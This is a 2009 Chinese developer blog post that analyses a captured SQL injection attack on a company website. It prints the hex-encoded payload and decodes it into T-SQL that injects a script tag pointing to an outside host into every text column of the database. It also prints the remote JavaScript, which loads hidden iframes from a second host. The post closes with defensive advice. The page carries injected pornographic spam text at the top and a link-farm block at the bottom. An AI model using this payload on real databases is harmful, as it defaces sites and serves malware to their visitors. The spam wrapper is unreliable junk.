<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      SQL注入案例曝光,請大家提高警惕

      近日公司網站發現有無聊人進行SQL注入攻擊,在這里曝曝光,在鄙視那些"無聊之人無聊之舉"的同時,望大家提高安全意識。

      日志記錄內容是這樣的
      Url:/(x(1)a(eq2io1uyygekaaaanwqxmge4ywytzwy5yi00ytbjlwjlmdatotllmtlmodaym2m5lcndikok9dche5rd2s_rxyhp43i1))/production/prodetail.aspx。SQL注入攻擊:e7fa47d3-5822-486f-a148-a77b8fd3802f;dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72 eXeC(@s);--

      簡單解說一下,呵呵。
      其一,跟常規注入手段一樣,前面加上';(分號,用于結束前一條語句),后邊加上--(用于注釋后邊的語句)
      其二,聲明了個 @s,關鍵部分來了,使用了編碼的方式把sql語句變成一大串“亂七八糟”的東西,然后通過exec可以執行“動態”SQL的特性運行腳本。還逃避了對關鍵字字符串的檢查。
      經過運行環境解釋那堆東西會變成以下語句
      Declare @T Varchar(255),@C Varchar(255)
      Declare Table_Cursor Cursor For
      Select A.Name,B.Name
      From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://8f8el3l.cn/0.js></script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor
      運行后庫中的每個表的每條記錄都會加上<script src=http://8f8el3l.cn/0.js></script>這段腳本,
      腳本內容是這樣的
      document.writeln(" <base onmouseover=\"window.status=\'完畢                                                  \';return true\">");
      document.writeln(" <SCRIPT LANGUAGE=\"JavaScript\"> ");
      document.writeln(" <!-- Hide ");
      document.writeln("function killErrors() { ");
      document.writeln("return true; ");
      document.writeln("} ");
      document.writeln("window.onerror = killErrors; ");
      document.writeln("\/\/ --> ");
      document.writeln(" <\/SCRIPT>");
      function Get(){
      var Then = new Date()
      Then.setTime(Then.getTime() + 800)
      var cookieString = new String(document.cookie)
      var cookieHeader = "Cookie1a01ab2="
      var beginPosition = cookieString.indexOf(cookieHeader)
      if (beginPosition != -1){
      } else
      { document.cookie = "Cookie1a01ab2=hhhh;expires="+ Then.toGMTString()
      document.writeln("<iframe src=http://5u66j.cn/aa/a3a.htm width=0 height=0></iframe>");
      document.writeln("<iframe src=http://5u66j.cn/aa/a3a.htm width=0 height=0></iframe>");
      }
      }Get();

      接著下來會發生什么事就不用再多說了。


      至于有哪些防范措施當然也是常用幾招嘍
      1.需要執行的SQL語句使用參數對象封裝參數數據,不要用字符串形式串個SQL出來直接運行,特別是Internet環境,別以為簡單的把文本框的長度限制一下,不讓那個框輸入什么就可以萬事大吉了。
      2.對最終需要運行的SQL語句做關鍵字檢查。不過也要好好考慮需要屏蔽哪些關鍵字嘍,像上邊例子,屏蔽了update還是沒用的嘍。
      3.通過開發個Http模塊,加強請求內容安全的處理嘍。

      其它的就留給大家一起來探討嘍。

      最后再一次聲明,曝光這些不是為了教大家怎么做SQL注入,而是提醒大家加強安全意識,再一次鄙視只搞破壞不搞建設的人,再慨嘆一句:為什么有這么有本事的人不動動腦筋做點好事,花這樣的時間來研究對別人有害對自己無益的事。 各位施主回頭是岸??!

      這兩天發現連深圳市考試中心的網站(http://www.testcenter.gov.cn/)也被這種攻擊整了,也不知道那些人攻擊的人是得到什么“收益”了,真是無聊透了。

      決定對捕獲的攻擊的IP和腳本塊公布到回復里面??赡艽伺e也是有些無聊,呵呵。

      posted @ 2009-07-28 18:24  黃耀輝  閱讀(13888)  評論(130)    收藏  舉報
      主站蜘蛛池模板: 国产综合久久久久久鬼色| 人人人澡人人肉久久精品| 狼人大伊人久久一区二区| 日韩亚洲精品中文字幕| 波多野结衣美乳人妻hd电影欧美| 亚洲成人av一区二区| 日韩国产精品中文字幕| 成人免费无遮挡在线播放| 亚洲精品一区二区三天美| 美日韩在线视频一区二区三区| 乱熟女高潮一区二区在线| 国产精品老熟女一区二区| 欧美大bbbb流白水| 欧美日韩精品一区二区三区在线| 激情综合色综合啪啪开心| 成人免费无码大片A毛片抽搐色欲| 成人无码精品1区2区3区免费看| 日韩精品无码免费专区午夜不卡 | 亚洲国产精品成人无码区| 国产精品久久久久免费观看| 蜜桃成人无码区免费视频网站| 国产一区二区不卡自拍| 财经| 久久美女夜夜骚骚免费视频| 卡一卡2卡3卡精品网站| 驻马店市| 国产精品人妻熟女男人的天堂 | 亚洲精品自拍在线视频| 92自拍视频爽啪在线观看| 99在线国内在线视频22| 亚洲国产日韩精品久久| 亚洲国产日韩一区三区| 农村妇女野外一区二区视频| 国产亚洲精品久久久久5区| 成人免费精品网站在线观看影片| 67194熟妇在线观看线路| 色道久久综合亚洲精品蜜桃| 男女性高爱潮免费网站| 日本一卡2卡3卡4卡无卡免费| 免费无码午夜理论电影| 一本一本久久A久久精品综合不卡|